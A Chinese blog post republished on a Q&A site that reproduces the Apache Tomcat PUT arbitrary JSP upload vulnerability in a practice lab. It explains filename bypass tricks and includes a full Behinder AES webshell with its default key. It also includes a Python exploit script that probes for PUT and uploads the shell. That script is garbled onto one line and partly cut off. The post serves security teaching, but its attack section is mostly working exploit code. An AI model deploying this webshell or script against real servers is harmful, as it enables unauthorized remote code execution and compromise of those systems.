欢迎您访问365答案网,请分享给你的朋友!
生活常识 学习资料

[web攻防]Tomcat任意文件上传漏洞安鸾靶场复现

时间:2023-07-09

中华人民共和国网络安全法(出版物)_360百科

目录

漏洞成因

 复现过程

 方法一 手动上传

 方法二 (只需python 环境 不需要其他工具)


漏洞成因

当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
影响范围:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)


 这里还有一个细节

其实tomcat会对上传的文件内容进行限制,比如说禁止上传 .jpg 后缀的文件,只不过,这个过滤机制可以通过一些windows 或着 linux的特性绕过。

Windows下不允许文件以空格结尾

    以PUT /x.jsp%20 HTTP/1.1上传到windows会被自动去掉末尾空格

WindowsNTFS流

    PUT /x.jsp::$DATA HTTP/1.1

/在文件名中是非法的,也会被去除(Linux/Windows)

    PUT /x.jsp/ HTTP/1.1

本次使用的是第三种方法绕过

 复现过程

靶场地址

Apache Tomcat/8.5.19

 方法一 手动上传

在首页刷新 抓包 改为如下形式

发包后返回201 这时直接访问 木马存在(直接在网站根目录 xxxx/1.jsp)

 自带马 密码为默认rebeyond

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.base64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

 连接

终端 输入查找语句

find -name *flag*

 

 方法二 (只需python 环境 不需要其他工具)

其实漏洞利用的原理都一样,这个适合那些没有工具的哥们,比如有的蚁剑没有连接jsp马的选项。。。。 如果要下冰蝎的话,只能连接它的自带马。

python 脚本

conn = httplib.HTTPConnection(sys.argv[1]) conn.request(method='OPTIONS', url='/ffffzz') headers = dict(conn.getresponse().getheaders()) if 'allow' in headers and headers['allow'].find('PUT') > 0 : conn.close() conn = httplib.HTTPConnection(sys.argv[1]) url = "/" + str(int(time.time()))+'.jsp/' #url = "/" + str(int(time.time()))+'.jsp::$DATA' conn.request( method='PUT', url= url, body=body) res = conn.getresponse() if res.status == 201 : #print 'shell:', 'http://' + sys.argv[1] + url[:-7] print 'shell:', 'http://' + sys.argv[1] + url[:-1] elif res.status == 204 : print 'file exists' else: print 'error' conn.close() else: print 'Server not vulnerable'except Exception,e: print 'Error:', e"~/桌面/tomcat.py" 33L, 1603B 33,21 底端

 慢慢传参命令执行

 

参考链接

https://blog.csdn.net/qq115399231/article/details/97371795

https://blog.csdn.net/weixin_40412037/article/details/10625557

https://zhishihezi.net/c/c7ecf406d93ed094559f1cd654950609
Tomcat任意文件写入漏洞 - Xor0ne - 博客园



作者水平有限,有任何不当之处欢迎指正。

本文目的是为了传播web安全原理知识,提高相关人员的安全意识,任何利用本文提到的技术与工具造成的违法行为,后果自负! 

Copyright © 2016-2020 www.365daan.com All Rights Reserved. 365答案网 版权所有 备案号:

部分内容来自互联网,版权归原作者所有,如有冒犯请联系我们,我们将在三个工作时内妥善处理。